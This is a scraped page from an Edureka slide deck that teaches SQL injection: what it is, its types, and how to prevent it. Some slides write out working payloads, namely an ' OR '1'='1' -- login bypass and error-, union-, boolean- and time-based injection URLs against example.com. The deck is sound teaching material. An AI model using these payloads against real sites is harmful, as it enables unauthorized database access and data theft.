1 / 20
270 likes | 1.86k Views
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)<br>This u2018SQL Injection Attacku2019 PPT by Edureka will help you learn one of the most dangerous web application vulnerability u2013 SQL Injection. <br>Below is the list of topics covered in this session:<br><br>Web Application Security <br>What is SQL Injection Attack? <br>Types of SQL Injection attacks <br>Demo u2013 SQL Injection Attack Types <br>Prevention of SQL Injection Attack<br><br>Cyber Security Playlist: https://bit.ly/2N2jlNN <br>Cyber Security Blog Series: https://bit.ly/2AuULkP <br><br>Instagram: https://www.instagram.com/edureka_lea...<br>Facebook: https://www.facebook.com/edurekaIN/ <br>Twitter: https://twitter.com/edurekain <br>LinkedIn: https://www.linkedin.com/company/edureka
E N D
Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Agenda Types of SQL Injection Attacks What is Application Security? 03 01 05 Prevention of SQL Injection attack 04 02 Demo - SQL Injection Attack types What is SQL Injection Attack? Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Application Security Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Cybersecurity Cyber security refers to the body of technologies, processes, and practices designed to protect networks, devices, programs, and data from attack, damage, or unauthorized access. Application Security Network Security Information Security Operational Security Disaster Recovery End-user Education Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Web Application Vulnerabilities Application security is the use of software, hardware, and procedural methods to protect applications from external threats. Application Security 0.06% 0.19% Denial of Service XML External Entity Open Direct General Bypass Authentication Bypass Remote File Inclusion Full Path Disclosure Remote Code Execution Local File Inclusion Cross Site Request Forgery 0.63% 1.69% 2.19% 2.19% 2.44% 2.75% 4.57% 8.63% File Upload SQL Injection 9.69% 18.01% Cross Site Scripting 46.97% 0% 10% 20% 30% 40% 50% Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
What is SQL Injection? Copyright © 2019, edureka and/or its affiliates. All rights reserved.
The need for more advanced technology and dynamic websites grew. Front End: HTML, CSS, JavaScript Back End: .NET, PHP, Ruby, Python In the early days of internet, building websites was pretty straightforward Database: MySQL, Oracle, MongoDB
What is SQL Injection? A SQL query is in one way an application interacts with database An SQL Injection occurs when an application fails to sanitize the user input data An attacker can use specially crafted SQL commands to control web application’s database server Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
SQL Injection Attack – Non Technical Explanation Drive through <route> and <where should the bus stop?> if <when should the bus stop?>. Sample populated form Drive through route77 and stop at the bus stop if there are people at the bus stop Drive through route77 and do not stop at the bus stop and ignore the rest of the from. if there are people at the bus stop Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
SQL Injection Attack – Technical Explanation Sample SQL statement $statement = “SELECT * FROM users WHERE username = ‘$user’ AND password = ‘$password‘“; $statement = “SELECT * FROM users WHERE username = ‘Dean’ AND password = ‘WinchesterS’“; Sample SQL Injection Condition that will always be true, thereby it is accepted as a valid input by the application $statement = “SELECT * FROM users WHERE username = ‘Dean OR ‘1’=‘1’ --‘AND password = ‘WinchesterS’“; Instructs the SQL parser that the rest of the line is a comment and should not be executed Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Impact of SQL Injection Attack Delete data and drop tables Extract sensitive information Misusing authentication details Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Types of SQL Injection Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Categories of SQL Injection SQL Injection Out-of-bound SQLi In-Band SQLi Blind SQLi Union-based Error-based Time-based Boolean-based Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Types of SQL Injection Error-based SQL Injection Union-based SQL Injection https://example.com/index.php?id=1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false) Error Based Error Based Union Based Union Based Boolean Based Boolean Based Time Based Time Based Out-of-bound Out-of-bound https://example.com/index.php?id=1 AND SELECT "mysql" UNION SELECT @@version https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)) Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Demo – Types of SQL Injection Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Preventing SQL Injection Performing static and dynamic testing Using parameterized queries and ORMs Using escape characters in SQL queries Enforcing least privilege on database Enabling web-application firewalls Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Exploiting SQL Vulnerability in Application Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
